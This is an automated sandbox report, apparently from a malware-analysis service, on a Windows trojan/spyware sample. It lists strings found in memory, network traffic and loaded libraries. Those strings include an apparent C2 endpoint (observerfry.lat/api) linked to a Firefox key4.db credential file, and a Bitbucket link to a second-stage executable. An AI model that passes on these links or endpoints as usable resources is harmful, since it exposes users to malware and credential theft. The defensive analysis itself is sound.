Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: NAnOVCOt4L.exe, 00000000.00000002.2380246394.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: NAnOVCOt4L.exe, 00000000.00000002.2380246394.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: NAnOVCOt4L.exe	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.publi
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.n
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BC1000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/I
Source: NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
Source: NAnOVCOt4L.exe, 00000000.00000003.2019875119.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2020031674.000000000150B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
Source: NAnOVCOt4L.exe, 00000000.00000003.2019875119.00000000014BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: NAnOVCOt4L.exe, 00000000.00000002.2377642265.000000000115B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeU
Source: NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeP
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1871791653.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1828273625.0000000005BA4000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1832704225.0000000005BA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/
Source: NAnOVCOt4L.exe, 00000000.00000003.1853962544.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/api
Source: NAnOVCOt4L.exe, 00000000.00000003.1853962544.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1828385529.0000000001532000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1871791653.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854210350.0000000001532000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apiZ
Source: NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apill
Source: NAnOVCOt4L.exe, 00000000.00000003.1803495068.0000000001532000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1802723716.0000000001532000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apit
Source: NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/b
Source: NAnOVCOt4L.exe, 00000000.00000003.1853962544.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1871791653.000000000152D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/pi
Source: NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/api
Source: NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/apis92o4p.default-release/key4.dbPK
Source: NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: NAnOVCOt4L.exe, 00000000.00000003.1748377481.0000000005C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: NAnOVCOt4L.exe, 00000000.00000003.1775576316.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1775397228.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748377481.0000000005BFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: NAnOVCOt4L.exe, 00000000.00000003.1775576316.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1775397228.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748377481.0000000005BFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: NAnOVCOt4L.exe, 00000000.00000002.2378096531.000000000153E000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2380246394.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.149:443 -> 192.168.2.4:49745 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: NAnOVCOt4L.exe	Static PE information: section name:
Source: NAnOVCOt4L.exe	Static PE information: section name: .rsrc
Source: NAnOVCOt4L.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Code function: 0_3_015333BA

0_3_015333BA

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 1804

Source: NAnOVCOt4L.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: NAnOVCOt4L.exe

Static PE information: Section: ZLIB complexity 0.9973646190068494

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7008

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\1d9fbb82-3f33-4c62-b671-08a7b2a38978

Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NAnOVCOt4L.exe, 00000000.00000003.1748164310.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1775668808.0000000005BA1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NAnOVCOt4L.exe

ReversingLabs: Detection: 63%

Source: NAnOVCOt4L.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: NAnOVCOt4L.exe	String found in binary or memory: $RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeW

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

File read: C:\Users\user\Desktop\NAnOVCOt4L.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NAnOVCOt4L.exe "C:\Users\user\Desktop\NAnOVCOt4L.exe"
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 1804

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: rsaenh.dll	Jump to behavior
